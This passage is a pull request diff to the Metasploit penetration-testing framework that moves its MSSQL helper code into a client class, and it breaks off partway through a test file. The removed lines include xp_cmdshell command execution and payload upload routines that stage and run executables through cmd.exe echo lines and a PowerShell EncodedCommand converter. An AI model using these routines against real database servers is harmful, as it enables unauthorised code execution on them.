### PR TITLE
Convert MSSQL mixin to class

### DIFF
--- a/lib/metasploit/framework/tcp/client.rb
+++ b/lib/metasploit/framework/tcp/client.rb
@@ -73,7 +73,6 @@ module Metasploit
         # @see Rex::Socket::Tcp
         # @see Rex::Socket::Tcp.create
         def connect(global = true, opts={})
-
           dossl = false
           if(opts.has_key?('SSL'))
             dossl = opts['SSL']

--- a/lib/msf/core/exploit/remote/mssql.rb
+++ b/lib/msf/core/exploit/remote/mssql.rb
@@ -1,21 +1,19 @@
 # -*- coding: binary -*-
 
-require 'metasploit/framework/mssql/base'
+require 'rex/proto/mssql/client'
+require 'metasploit/framework/tcp/client'
 
 module Msf
-
 ###
 #
 # This module exposes methods for querying a remote MSSQL service
 #
 ###
 module Exploit::Remote::MSSQL
-
   include Exploit::Remote::MSSQL_COMMANDS
   include Exploit::Remote::Udp
   include Exploit::Remote::Tcp
   include Exploit::Remote::NTLM::Client
-  include Metasploit::Framework::MSSQL::Base
   include Msf::Exploit::Remote::Kerberos::Ticket::Storage
   include Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options
 
@@ -32,8 +30,8 @@ module Exploit::Remote::MSSQL
         Opt::RPORT(1433),
         OptString.new('USERNAME', [ false, 'The username to authenticate as', 'sa']),
         OptString.new('PASSWORD', [ false, 'The password for the specified username', '']),
-        OptBool.new('TDSENCRYPTION', [ true, 'Use TLS/SSL for TDS data "Force Encryption"', false]),
         OptBool.new('USE_WINDOWS_AUTHENT', [ true, 'Use windows authentication (requires DOMAIN option set)', false]),
+        # OptBool.new('TDSENCRYPTION', [ true, 'Use TLS/SSL for TDS data "Force Encryption"', false]), - TODO: support TDS Encryption
       ], Msf::Exploit::Remote::MSSQL)
     register_advanced_options(
       [
@@ -47,7 +45,6 @@ module Exploit::Remote::MSSQL
     register_autofilter_ports([ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ])
     register_autofilter_services(%W{ ms-sql-s ms-sql2000 sybase })
   end
-
 
   #
   # This method sends a UDP query packet to the server and
@@ -107,188 +104,79 @@ module Exploit::Remote::MSSQL
   #
   # Execute a system command via xp_cmdshell
   #
+  def mssql_parse_tds_reply(data, info)
+    @mssql_client.mssql_parse_tds_reply(data, info)
+  end
+
+  def mssql_parse_reply(data, info)
+    @mssql_client.mssql_parse_reply(data, info)
+  end
+
+  #
+  # Parse a single row of a TDS reply
+  #
+  def mssql_parse_tds_row(data, info)
+    @mssql_client.mssql_parse_tds_row(data, info)
+  end
+
+  #
+  # Parse a "ret" TDS token
+  #
+  def mssql_parse_ret(data, info)
+    @mssql_client.mssql_parse_ret(data, info)
+  end
+
+  #
+  # Parse a "done" TDS token
+  #
+  def mssql_parse_done(data, info)
+    @mssql_client.mssql_parse_done(data, info)
+  end
+
+  #
+  # Parse an "error" TDS token
+  #
+  def mssql_parse_error(data, info)
+    @mssql_client.mssql_parse_error(data, info)
+  end
+
+  #
+  # Parse an "environment change" TDS token
+  #
+  def mssql_parse_env(data, info)
+    @mssql_client.mssql_parse_env(data, info)
+  end
+
+  #
+  # Parse an "information" TDS token
+  #
+  def mssql_parse_info(data, info)
+    @mssql_client.mssql_parse_info(data, info)
+  end
+
   def mssql_xpcmdshell(cmd, doprint=false, opts={})
-    force_enable = false
-    begin
-      res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", false, opts)
-      if res[:errors] && !res[:errors].empty?
-        if res[:errors].join =~ /xp_cmdshell/
-          if force_enable
-            print_error("The xp_cmdshell procedure is not available and could not be enabled")
-            raise RuntimeError, "Failed to execute command"
-          else
-            print_status("The server may have xp_cmdshell disabled, trying to enable it...")
-            mssql_query(mssql_xpcmdshell_enable())
-            raise RuntimeError, "xp_cmdshell disabled"
-          end
-        end
-      end
-
-      mssql_print_reply(res) if doprint
-
-      return res
-
-    rescue RuntimeError => e
-      if e.to_s =~ /xp_cmdshell disabled/
-        force_enable = true
-        retry
-      end
-      raise e
-    end
+    @mssql_client.mssql_xpcmdshell(cmd, doprint, opts)
   end
 
   #
   # Upload and execute a Windows binary through MSSQL queries
   #
   def mssql_upload_exec(exe, debug=false)
-    hex = exe.unpack("H*")[0]
-
-    var_bypass  = rand_text_alpha(8)
-    var_payload = rand_text_alpha(8)
-
-    print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
-    print_status("Writing the debug.com loader to the disk...")
-    h2b = File.read(datastore['HEX2BINARY'], File.size(datastore['HEX2BINARY']))
-    h2b.gsub!(/KemneE3N/, "%TEMP%\\#{var_bypass}")
-    h2b.split(/\n/).each do |line|
-      mssql_xpcmdshell("#{line}", false)
-    end
-
-    print_status("Converting the debug script to an executable...")
-    mssql_xpcmdshell("cmd.exe /c cd %TEMP% && cd %TEMP% && debug < %TEMP%\\#{var_bypass}", debug)
-    mssql_xpcmdshell("cmd.exe /c move %TEMP%\\#{var_bypass}.bin %TEMP%\\#{var_bypass}.exe", debug)
-
-    print_status("Uploading the payload, please be patient...")
-    idx = 0
-    cnt = 500
-    while(idx < hex.length - 1)
-      mssql_xpcmdshell("cmd.exe /c echo #{hex[idx, cnt]}>>%TEMP%\\#{var_payload}", false)
-      idx += cnt
-    end
-
-    print_status("Converting the encoded payload...")
-    mssql_xpcmdshell("%TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug)
-    mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_bypass}.exe", debug)
-    mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
-
-    print_status("Executing the payload...")
-    mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
+    @mssql_client.mssql_upload_exec(exe, debug)
   end
-
 
   #
   # Upload and execute a Windows binary through MSSQL queries and Powershell
   #
   def powershell_upload_exec(exe, debug=false)
-
-    # hex converter
-    hex = exe.unpack("H*")[0]
-    # create random alpha 8 character names
-    #var_bypass  = rand_text_alpha(8)
-    var_payload = rand_text_alpha(8)
-    print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
-    # our payload converter, grabs a hex file and converts it to binary for us through powershell
-    h2b = "$s = gc 'C:\\Windows\\Temp\\#{var_payload}';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('C:\\Windows\\Temp\\#{var_payload}.exe',$b)"
-    h2b_unicode=Rex::Text.to_unicode(h2b)
-    # base64 encode it, this allows us to perform execution through powershell without registry changes
-    h2b_encoded = Rex::Text.encode_base64(h2b_unicode)
-    print_status("Uploading the payload #{var_payload}, please be patient...")
-    idx = 0
-    cnt = 500
-    while(idx < hex.length - 1)
-      mssql_xpcmdshell("cmd.exe /c echo #{hex[idx, cnt]}>>%TEMP%\\#{var_payload}", false)
-      idx += cnt
-    end
-    print_status("Converting the payload utilizing PowerShell EncodedCommand...")
-    mssql_xpcmdshell("powershell -EncodedCommand #{h2b_encoded}", debug)
-    mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
-    print_status("Executing the payload...")
-    mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
-    print_status("Be sure to cleanup #{var_payload}.exe...")
+    @mssql_client.powershell_upload_exec(exe, debug)
   end
 
   #
   #this method send a prelogin packet and check if encryption is off
   #
   def mssql_prelogin(enc_error=false)
-
-    pkt = ""
-    pkt_hdr = ""
-    pkt_data_token = ""
-    pkt_data = ""
-
-
-    pkt_hdr =  [
-      TYPE_PRE_LOGIN_MESSAGE, #type
-      STATUS_END_OF_MESSAGE, #status
-      0x0000, #length
-      0x0000, # SPID
-      0x00, # PacketID
-      0x00 #Window
-    ]
-
-    version = [0x55010008, 0x0000].pack("Vv")
-    encryption = ENCRYPT_NOT_SUP # off
-    instoptdata = "MSSQLServer\0"
-
-    threadid =   "\0\0" + Rex::Text.rand_text(2)
-
-    idx = 21 # size of pkt_data_token
-    pkt_data_token <<  [
-      0x00, # Token 0 type Version
-      idx, # VersionOffset
-      version.length, # VersionLength
-
-      0x01, # Token 1 type Encryption
-      idx = idx + version.length, # EncryptionOffset
-      0x01, # EncryptionLength
-
-      0x02, # Token 2 type InstOpt
-      idx = idx + 1, # InstOptOffset
-      instoptdata.length, # InstOptLength
-
-      0x03, # Token 3 type Threadid
-      idx + instoptdata.length, # ThreadIdOffset
-      0x04, # ThreadIdLength
-
-      0xFF
-    ].pack("CnnCnnCnnCnnC")
-
-    pkt_data << pkt_data_token
-    pkt_data << version
-    pkt_data << encryption
-    pkt_data << instoptdata
-    pkt_data << threadid
-
-    pkt_hdr[2] = pkt_data.length + 8
-
-    pkt = pkt_hdr.pack("CCnnCC") + pkt_data
-
-    resp = mssql_send_recv(pkt)
-
-    idx = 0
-
-    while resp && resp[0, 1] != "\xff" && resp.length > 5
-      token = resp.slice!(0, 5)
-      token = token.unpack("Cnn")
-      idx -= 5
-      if token[0] == 0x01
-        idx += token[1]
-        break
-      end
-    end
-
-    if idx > 0
-      encryption_mode = resp[idx, 1].unpack("C")[0]
-    else
-      # force to ENCRYPT_NOT_SUP and hope for the best
-      encryption_mode = ENCRYPT_NOT_SUP
-    end
-
-    if encryption_mode != ENCRYPT_NOT_SUP && enc_error
-      raise RuntimeError,"Encryption is not supported"
-    end
-    encryption_mode
+    @mssql_client.mssql_prelogin(enc_error)
   end
 
   #
@@ -296,430 +184,40 @@ module Exploit::Remote::MSSQL
   # to authenticate with the supplied username and password
   # The global socket is used and left connected after auth
   #
-  def mssql_login(user='sa', pass='', db='')
-
-    disconnect if self.sock
-    connect
-
-    begin
-      # Send a prelogin packet and check that encryption is not enabled
-      if mssql_prelogin != ENCRYPT_NOT_SUP
-        print_error('Encryption is not supported')
-        return false
-      end
-    rescue EOFError
-      print_error('Probable server or network failure')
-      return false
-    end
-
-    if datastore['Mssql::Auth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
-      idx = 0
-      pkt = ''
-      pkt_hdr = ''
-      pkt_hdr =  [
-        TYPE_TDS7_LOGIN, #type
-        STATUS_END_OF_MESSAGE, #status
-        0x0000, #length
-        0x0000, # SPID
-        0x01,   # PacketID (unused upon specification
-        # but ms network monitor still prefer 1 to decode correctly, wireshark don't care)
-        0x00   #Window
-      ]
-
-      pkt << [
-        0x00000000,   # Size
-        0x71000001,   # TDS Version
-        0x00000000,   # Dummy Size
-        0x00000007,   # Version
-        rand(1024+1), # PID
-        0x00000000,   # ConnectionID
-        0xe0,         # Option Flags 1
-        0x83,         # Option Flags 2
-        0x00,         # SQL Type Flags
-        0x00,         # Reserved Flags
-        0x00000000,   # Time Zone
-        0x00000000    # Collation
-      ].pack('VVVVVVCCCCVV')
-
-      cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
-      aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
-      sname = Rex::Text.to_unicode( rhost )
-
-      fail_with(Msf::Exploit::Failure::BadConfig, 'The Mssql::Rhostname option is required when using Kerberos authentication.') if datastore['Mssql::Rhostname'].blank?
-      fail_with(Msf::Exploit::Failure::BadConfig, 'The DOMAIN option is required when using Kerberos authentication.') if datastore['DOMAIN'].blank?
-      offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['MssqlKrbOfferedEncryptionTypes'])
-      fail_with(Msf::Exploit::Failure::BadConfig, 'At least one encryption type is required when using Kerberos authentication.') if offered_etypes.empty?
-
-      kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::MSSQL.new(
-        host: datastore['DomainControllerRhost'].blank? ? nil : datastore['DomainControllerRhost'],
-        hostname: datastore['Mssql::Rhostname'],
-        proxies: datastore['Proxies'],
-        mssql_port: rport,
-        realm: datastore['MssqlDomain'],
-        username: datastore['username'],
-        password: datastore['password'],
-        framework: framework,
-        framework_module: self,
-        cache_file: datastore['Mssql::Krb5Ccname'].blank? ? nil : datastore['Mssql::Krb5Ccname'],
-        ticket_storage: kerberos_ticket_storage,
-        offered_etypes: offered_etypes
-      )
-
-      kerberos_result = kerberos_authenticator.authenticate
-      ssp_security_blob = kerberos_result[:security_blob]
-
-      idx = pkt.size + 50 # lengths below
-
-      pkt << [idx, cname.length / 2].pack('vv')
-      idx += cname.length
-
-      pkt << [0, 0].pack('vv') # User length offset must be 0
-      pkt << [0, 0].pack('vv') # Password length offset must be 0
-
-      pkt << [idx, aname.length / 2].pack('vv')
-      idx += aname.length
-
-      pkt << [idx, sname.length / 2].pack('vv')
-      idx += sname.length
-
-      pkt << [0, 0].pack('vv') # unused
-
-      pkt << [idx, aname.length / 2].pack('vv')
-      idx += aname.length
-
-      pkt << [idx, 0].pack('vv') # locales
-
-      pkt << [idx, 0].pack('vv') #db
-
-      # ClientID (should be mac address)
-      pkt << Rex::Text.rand_text(6)
-
-      # SSP
-      pkt << [idx, ssp_security_blob.length].pack('vv')
-      idx += ssp_security_blob.length
-
-      pkt << [idx, 0].pack('vv') # AtchDBFile
-
-      pkt << cname
-      pkt << aname
-      pkt << sname
-      pkt << aname
-      pkt << ssp_security_blob
-
-      # Total packet length
-      pkt[0, 4] = [pkt.length].pack('V')
-
-      pkt_hdr[2] = pkt.length + 8
-
-      pkt = pkt_hdr.pack("CCnnCC") + pkt
-
-      # Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
-      # has a strange behavior that differs from the specifications
-      # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
-      # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentication
-      resp = mssql_send_recv(pkt, 15, false)
-
-      info = {:errors => []}
-      info = mssql_parse_reply(resp, info)
-
-      return false if not info
-      return info[:login_ack] ? true : false
-    elsif datastore['Mssql::Auth'] == Msf::Exploit::Remote::AuthOption::NTLM || datastore['USE_WINDOWS_AUTHENT']
-      idx = 0
-      pkt = ''
-      pkt_hdr = ''
-      pkt_hdr =  [
-          TYPE_TDS7_LOGIN, #type
-          STATUS_END_OF_MESSAGE, #status
-          0x0000, #length
-          0x0000, # SPID
-          0x01,   # PacketID (unused upon specification
-            # but ms network monitor still prefer 1 to decode correctly, wireshark don't care)
-          0x00   #Window
-          ]
-
-      pkt << [
-        0x00000000,   # Size
-        0x71000001,   # TDS Version
-        0x00000000,   # Dummy Size
-        0x00000007,   # Version
-        rand(1024+1), # PID
-        0x00000000,   # ConnectionID
-        0xe0,         # Option Flags 1
-        0x83,         # Option Flags 2
-        0x00,         # SQL Type Flags
-        0x00,         # Reserved Flags
-        0x00000000,   # Time Zone
-        0x00000000    # Collation
-      ].pack('VVVVVVCCCCVV')
-
-      cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
-      aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
-      sname = Rex::Text.to_unicode( rhost )
-      dname = Rex::Text.to_unicode( db )
-
-      workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
-
-      ntlm_client = ::Net::NTLM::Client.new(
-        user,
-        pass,
-        workstation: workstation_name,
-        domain: datastore['DOMAIN'],
-      )
-      type1 = ntlm_client.init_context
-      # SQL 2012, at least, does not support KEY_EXCHANGE
-      type1.flag &= ~ ::Net::NTLM::FLAGS[:KEY_EXCHANGE]
-      ntlmsspblob = type1.serialize
-
-      idx = pkt.size + 50 # lengths below
-
-      pkt << [idx, cname.length / 2].pack('vv')
-      idx += cname.length
-
-      pkt << [0, 0].pack('vv') # User length offset must be 0
-      pkt << [0, 0].pack('vv') # Password length offset must be 0
-
-      pkt << [idx, aname.length / 2].pack('vv')
-      idx += aname.length
-
-      pkt << [idx, sname.length / 2].pack('vv')
-      idx += sname.length
-
-      pkt << [0, 0].pack('vv') # unused
-
-      pkt << [idx, aname.length / 2].pack('vv')
-      idx += aname.length
-
-      pkt << [idx, 0].pack('vv') # locales
-
-      pkt << [idx, 0].pack('vv') #db
-
-      # ClientID (should be mac address)
-      pkt << Rex::Text.rand_text(6)
-
-      # NTLMSSP
-      pkt << [idx, ntlmsspblob.length].pack('vv')
-      idx += ntlmsspblob.length
-
-      pkt << [idx, 0].pack('vv') # AtchDBFile
-
-      pkt << cname
-      pkt << aname
-      pkt << sname
-      pkt << aname
-      pkt << ntlmsspblob
-
-      # Total packet length
-      pkt[0, 4] = [pkt.length].pack('V')
-
-      pkt_hdr[2] = pkt.length + 8
-
-      pkt = pkt_hdr.pack("CCnnCC") + pkt
-
-      # Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
-      # has a strange behavior that differs from the specifications
-      # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
-      # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentication
-      resp = mssql_send_recv(pkt, 15, false)
-
-      unless resp.include?("NTLMSSP")
-        info = {:errors => []}
-        mssql_parse_reply(resp, info)
-        mssql_print_reply(info)
-        return false
-      end
-
-      # Get default data
-      resp = resp[3..-1]
-      type3 = ntlm_client.init_context([resp].pack('m'))
-      type3_blob = type3.serialize
-
-      # Create an SSPIMessage
-      idx = 0
-      pkt = ''
-      pkt_hdr = ''
-      pkt_hdr = [
-        TYPE_SSPI_MESSAGE, #type
-        STATUS_END_OF_MESSAGE, #status
-        0x0000, #length
-        0x0000, # SPID
-        0x01, # PacketID
-        0x00 #Window
-      ]
-
-      pkt_hdr[2] = type3_blob.length + 8
-
-      pkt = pkt_hdr.pack("CCnnCC") + type3_blob
-
-      resp = mssql_send_recv(pkt)
-
-
-    #SQL Server authentication
-    else
-      idx = 0
-      pkt = ''
-      pkt << [
-        0x00000000,   # Dummy size
-
-        0x71000001,   # TDS Version
-        0x00000000,   # Size
-        0x00000007,   # Version
-        rand(1024+1), # PID
-        0x00000000,   # ConnectionID
-        0xe0,         # Option Flags 1
-        0x03,         # Option Flags 2
-        0x00,         # SQL Type Flags
-        0x00,         # Reserved Flags
-        0x00000000,   # Time Zone
-        0x00000000    # Collation
-      ].pack('VVVVVVCCCCVV')
-
-
-      cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
-      uname = Rex::Text.to_unicode( user )
-      pname = mssql_tds_encrypt( pass )
-      aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
-      sname = Rex::Text.to_unicode( rhost )
-      dname = Rex::Text.to_unicode( db )
-
-      idx = pkt.size + 50 # lengths below
-
-      pkt << [idx, cname.length / 2].pack('vv')
-      idx += cname.length
-
-      pkt << [idx, uname.length / 2].pack('vv')
-      idx += uname.length
-
-      pkt << [idx, pname.length / 2].pack('vv')
-      idx += pname.length
-
-      pkt << [idx, aname.length / 2].pack('vv')
-      idx += aname.length
-
-      pkt << [idx, sname.length / 2].pack('vv')
-      idx += sname.length
-
-      pkt << [0, 0].pack('vv')
-
-      pkt << [idx, aname.length / 2].pack('vv')
-      idx += aname.length
-
-      pkt << [idx, 0].pack('vv')
-
-      pkt << [idx, dname.length / 2].pack('vv')
-      idx += dname.length
-
-      # The total length has to be embedded twice more here
-      pkt << [
-        0,
-        0,
-        0x12345678,
-        0x12345678
-      ].pack('vVVV')
-
-      pkt << cname
-      pkt << uname
-      pkt << pname
-      pkt << aname
-      pkt << sname
-      pkt << aname
-      pkt << dname
-
-      # Total packet length
-      pkt[0, 4] = [pkt.length].pack('V')
-
-      # Embedded packet lengths
-      pkt[pkt.index([0x12345678].pack('V')), 8] = [pkt.length].pack('V') * 2
-
-      # Packet header and total length including header
-      pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt
-
-      begin
-        resp = mssql_send_recv(pkt)
-      rescue EOFError
-        print_error('Probable server or network failure')
-        return false
-      end
-    end
-
-    info = {:errors => []}
-    info = mssql_parse_reply(resp, info)
-
-    return false if not info
-    info[:login_ack] ? true : false
+  def mssql_login(user='sa', pass='', db='', domain_name='')
+    @mssql_client ||= Rex::Proto::MSSQL::Client.new(self, framework, datastore['RHOST'], datastore['RPORT'])
+    result = @mssql_client.mssql_login(user, pass, db, domain_name)
+    add_socket(@mssql_client.sock) if @mssql_client.sock && !sockets.include?(@mssql_client.sock)
+    result
   end
 
-  #
-  # Login to the SQL server using the standard USERNAME/PASSWORD options
-  #
-  def mssql_login_datastore(db='')
-    mssql_login(datastore['USERNAME'], datastore['PASSWORD'], db)
+  def mssql_login_datastore(db=nil)
+    mssql_login(datastore['USERNAME'], datastore['PASSWORD'], db || datastore['DATABASE'] || '', datastore['MssqlDomain'] || '')
   end
-
   #
   # Issue a SQL query using the TDS protocol
   #
   def mssql_query(sqla, doprint=false, opts={})
-    info = { :sql => sqla }
-
-    opts[:timeout] ||= 15
-
-    pkts = []
-    idx  = 0
-
-    bsize = 4096 - 8
-    chan  = 0
-
-    @cnt ||= 0
-    @cnt += 1
-
-    sql = Rex::Text.to_unicode(sqla)
-    while(idx < sql.length)
-      buf = sql[idx, bsize]
-      flg = buf.length < bsize ? "\x01" : "\x00"
-      pkts << "\x01" + flg + [buf.length + 8].pack('n') + [chan].pack('n') + [@cnt].pack('C') + "\x00" + buf
-      idx += bsize
-
-    end
-
-    resp = mssql_send_recv(pkts.join, opts[:timeout])
-    mssql_parse_reply(resp, info)
-    mssql_print_reply(info) if doprint
-    info
+    @mssql_client.mssql_query(sqla, doprint, opts)
   end
 
   #
   # Nicely print the results of a SQL query
   #
   def mssql_print_reply(info)
+    @mssql_client.mssql_print_reply(info)
+  end
 
-    print_status("SQL Query: #{info[:sql]}")
+  def mssql_send_recv(req, timeout=15, check_status = true)
+    @mssql_client.mssql_send_recv(req, timeout, check_status)
+  end
 
-    if info[:done] && info[:done][:rows].to_i > 0
-      print_status("Row Count: #{info[:done][:rows]} (Status: #{info[:done][:status]} Command: #{info[:done][:cmd]})")
-    end
-
-    if info[:errors] && !info[:errors].empty?
-      info[:errors].each do |err|
-        print_error(err)
-      end
-    end
-
-    if info[:rows] && !info[:rows].empty?
-
-      tbl = Rex::Text::Table.new(
-        'Indent'    => 1,
-        'Header'    => "",
-        'Columns'   => info[:colnames],
-        'SortIndex' => -1
-      )
-
-      info[:rows].each do |row|
-        tbl << row
-      end
-
-      print_line(tbl.to_s)
-    end
+  #
+  # Encrypt a password according to the TDS protocol (encode)
+  #
+  def mssql_tds_encrypt(pass)
+    # Convert to unicode, swap 4 bits both ways, xor with 0xa5
+    Rex::Text.to_unicode(pass).unpack('C*').map {|c| (((c & 0x0f) << 4) + ((c & 0xf0) >> 4)) ^ 0xa5 }.pack("C*")
   end
 end
 end

--- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb
+++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::MSSQL
   include Msf::Auxiliary::Report

--- a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb
+++ b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::MSSQL
 

--- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb
+++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::MSSQL
 

--- a/modules/auxiliary/gather/lansweeper_collector.rb
+++ b/modules/auxiliary/gather/lansweeper_collector.rb
@@ -141,6 +141,11 @@ class MetasploitModule < Msf::Auxiliary
     end
     result = mssql_query("select Credname, Username, Password from #{datastore['DATABASE']}.dbo.tsysCredentials WHERE LEN(Password)>64", false)
 
+    if result[:errors]
+      print_error("SQL Query returned error: #{result[:errors].first}")
+      return
+    end
+
     result[:rows].each do |row|""
       pw = lsw_decrypt(row[2])
 

--- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb
+++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb
@@ -70,7 +70,8 @@ class MetasploitModule < Msf::Auxiliary
     create_credential_login(login_data)
 
     # Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
-    instancename= mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
+    instance_info = mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')
+    instancename = instance_info[1] || instance_info[0]
     print_status("Instance Name: #{instancename.inspect}")
     version = mssql_query(mssql_sql_info())[:rows][0][0]
     version_year = version.split('-')[0].slice(/\d\d\d\d/)
@@ -170,6 +171,4 @@ class MetasploitModule < Msf::Auxiliary
     return results
 
   end
-
-
 end

--- a/modules/auxiliary/scanner/mssql/mssql_login.rb
+++ b/modules/auxiliary/scanner/mssql/mssql_login.rb
@@ -5,6 +5,7 @@
 
 require 'metasploit/framework/credential_collection'
 require 'metasploit/framework/login_scanner/mssql'
+require 'rex/proto/mssql/client'
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::MSSQL
@@ -30,6 +31,9 @@ class MetasploitModule < Msf::Auxiliary
           'BLANK_PASSWORDS' => true
         }
     )
+    register_options([
+      OptBool.new('TDSENCRYPTION', [ true, 'Use TLS/SSL for TDS data "Force Encryption"', true]),
+    ])
 
     deregister_options('PASSWORD_SPRAY')
   end

--- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb
+++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb
@@ -2,13 +2,11 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-
 require 'yaml'
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::MSSQL
   include Msf::Auxiliary::Report
-
   include Msf::Auxiliary::Scanner
 
   def initialize
@@ -27,7 +25,7 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options([
       OptBool.new('DISPLAY_RESULTS', [true, "Display the Results to the Screen", true])
-      ])
+    ])
   end
 
   def run_host(ip)
@@ -38,7 +36,9 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     # Grabs the Instance Name and Version of MSSQL(2k,2k5,2k8)
-    instancename = mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')[1]
+    instance_info = mssql_query(mssql_enumerate_servername())[:rows][0][0].split('\\')
+    instancename = instance_info[1] || instance_info[0]
+
     print_status("Instance Name: #{instancename.inspect}")
     version = mssql_query(mssql_sql_info())[:rows][0][0]
     output = "Microsoft SQL Server Schema \n Host: #{datastore['RHOST']} \n Port: #{datastore['RPORT']} \n Instance: #{instancename} \n Version: #{version} \n====================\n\n"
@@ -121,6 +121,4 @@ class MetasploitModule < Msf::Auxiliary
     results = mssql_query("Select syscolumns.name,systypes.name,syscolumns.length from #{db_name}..syscolumns JOIN #{db_name}..systypes ON syscolumns.xtype=systypes.xtype WHERE syscolumns.id=#{table_id}")[:rows]
     return results
   end
-
-
 end

--- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb
+++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => '2005-12-08'
-      ))
+    ))
   end
 
   # Do not automatically run this module, it can lead to lockouts with SQL Server 2005

--- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb
+++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = GreatRanking
 

--- a/spec/lib/metasploit/framework/login_scanner/mssql_spec.rb
+++ b/spec/lib/metasploit/framework/login_scanner/mssql_spec.rb
@@ -35,7 +35,6 @@ RSpec.describe Metasploit::Framework::LoginScanner::MSSQL do
   it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: true, has_default_realm: true
   it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
   it_behaves_like 'Metasploit::Framework::LoginScanner::NTLM'
-  it_behaves_like 'Metasploit::Framework::Tcp::Client'
 
   it { is_expected.to respond_to :windows_authentication }
 
@@ -81,25 +80,34 @@ RSpec.describe Metasploit::Framework::LoginScanner::MSSQL do
 
   context '#attempt_login' do
     context 'when the is a connection error' do
+      let(:client) { instance_double(Rex::Proto::MSSQL::Client) }
       it 'returns a result with the connection_error status' do
         my_scanner = login_scanner
-        expect(my_scanner).to receive(:mssql_login).and_raise ::Rex::ConnectionError
+        allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:initialize).and_return(client)
+        allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:mssql_login).and_raise ::Rex::ConnectionError
+        allow(client).to receive(:disconnect)
         expect(my_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
       end
     end
 
     context 'when the login fails' do
+      let(:client) { instance_double(Rex::Proto::MSSQL::Client) }
       it 'returns a result object with a status of Metasploit::Model::Login::Status::INCORRECT' do
         my_scanner = login_scanner
-        expect(my_scanner).to receive(:mssql_login).and_return false
+        allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:initialize).and_return(client)
+        allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:mssql_login).and_return(false)
+        allow(client).to receive(:disconnect)
